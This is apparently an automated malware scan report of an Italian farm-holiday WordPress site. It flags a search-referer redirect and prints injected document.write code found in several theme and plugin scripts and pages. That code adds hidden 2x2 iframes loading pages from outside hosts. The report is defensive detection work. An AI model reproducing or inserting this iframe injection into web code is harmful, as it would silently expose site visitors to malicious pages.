Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.agriturismo-it.it/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.agriturismo-it.it Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Sun, 25 Oct 2015 06:03:26 GMT Location: http://reddeerhotyoga.ca/auyd.html?h=1597952 Server: nginx/1.8.0 Content-Length: 299 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.agriturismo-it.it/ | 200 OK Content-Length: 17478 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/auyd.html?i=1597952 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?i=1597952> | ||
http://www.agriturismo-it.it/wp-content/themes/agriturismo/script.js | 200 OK Content-Length: 11075 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?j=1597952></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://snmsc.org/ouyd.html?j=1597952></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/antd.ht }); artEventHelper.bind(button, 'mouseup', function(e) { e = e || window.event; button = e.target || e.srcElement; wrapper = button.parentNode; if (!artHasClass(button, 'active')) wrapper.className = wrapper.className.replace(/active/, ""); }); } } } artLoadEvent.add(function() { artButtonsSetupJsHover("button"); }); artLoadEvent.add(function() { artButtonsSetupJsHover("button"); }); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://signatureseriesguitar.com/antd.html?j=1597952 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/antd.html?j=1597952> Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/auyd.html?j=1597952 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?j=1597952> Hidden iFrame found. size: 2x2 src: http://snmsc.org/ouyd.html?j=1597952 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://snmsc.org/ouyd.html?j=1597952> | ||
http://www.agriturismo-it.it/wp-includes/js/jquery/jquery.js?ver=1.3.2 | 200 OK Content-Length: 57761 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?j=1597952></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://snmsc.org/ouyd.html?j=1597952></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/antd.ht jQuery.noConflict(); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://signatureseriesguitar.com/antd.html?j=1597952 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/antd.html?j=1597952> Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/auyd.html?j=1597952 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?j=1597952> Hidden iFrame found. size: 2x2 src: http://snmsc.org/ouyd.html?j=1597952 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://snmsc.org/ouyd.html?j=1597952> | ||
http://www.agriturismo-it.it/wp-includes/js/jquery/jquery.form.js?ver=2.02m | 200 OK Content-Length: 8915 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?j=1597952></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://snmsc.org/ouyd.html?j=1597952></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/antd.ht Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://signatureseriesguitar.com/antd.html?j=1597952 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/antd.html?j=1597952> Hidden iFrame found. size: 2x2 src: http://snmsc.org/ouyd.html?j=1597952 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://snmsc.org/ouyd.html?j=1597952> Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/auyd.html?j=1597952 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?j=1597952> | ||
http://www.agriturismo-it.it/wp-content/plugins/contact-form-7/scripts.js?ver=2.1.1 | 200 OK Content-Length: 4928 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?j=1597952></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://snmsc.org/ouyd.html?j=1597952></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/antd.ht jQuery(form).find('input:hidden[name="_wpcf7_quiz_answer_' + i + '"]').attr('value', n[1]); }); } function wpcf7ClearResponseOutput() { jQuery('div.wpcf7-response-output').hide().empty().removeClass('wpcf7-mail-sent-ok wpcf7-mail-sent-ng wpcf7-validation-errors wpcf7-spam-blocked'); jQuery('span.wpcf7-not-valid-tip').remove(); jQuery('img.ajax-loader').css({ visibility: 'hidden' }); } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://signatureseriesguitar.com/antd.html?j=1597952 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://signatureseriesguitar.com/antd.html?j=1597952> Hidden iFrame found. size: 2x2 src: http://snmsc.org/ouyd.html?j=1597952 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://snmsc.org/ouyd.html?j=1597952> Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/auyd.html?j=1597952 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?j=1597952> | ||
http://www.agriturismo-it.it/bed-and-breakfast.html | 200 OK Content-Length: 7597 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/auyd.html?i=1597952 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?i=1597952> | ||
http://www.agriturismo-it.it/hotel.html | 200 OK Content-Length: 7596 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/auyd.html?i=1597952 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?i=1597952> | ||
http://www.agriturismo-it.it/ristoranti.html | 200 OK Content-Length: 7816 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/auyd.html?i=1597952 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?i=1597952> | ||
http://www.agriturismo-it.it/inserimento-online.html | 200 OK Content-Length: 21588 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/auyd.html?i=1597952 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?i=1597952> | ||
http://www.agriturismo-it.it/wp-content/uploads/2010/02/struttura-turistica-online1.jpg | 200 OK Content-Length: 24262 Content-Type: image/jpeg | clean |
http://www.agriturismo-it.it/test404page.js | 404 Not Found Content-Length: 9806 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/auyd.html?i=1597952 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?i=1597952> | ||
http://www.agriturismo-it.it/agriturismo_abruzzo.html | 200 OK Content-Length: 13489 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/auyd.html?i=1597952 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?i=1597952> | ||
http://www.agriturismo-it.it/agriturismo_basilicata.html | 200 OK Content-Length: 12519 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/auyd.html?i=1597952 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?i=1597952> | ||
http://www.agriturismo-it.it/agriturismo_calabria.html | 200 OK Content-Length: 12668 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/auyd.html?i=1597952 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?i=1597952> | ||
http://www.agriturismo-it.it/agriturismo_campania.html | 200 OK Content-Length: 14614 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://reddeerhotyoga.ca/auyd.html?i=1597952 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://reddeerhotyoga.ca/auyd.html?i=1597952> |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=agriturismo-it.it
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://agriturismo-it.it/
Result: agriturismo-it.it is not infected or malware details are not published yet.
Result: agriturismo-it.it is not infected or malware details are not published yet.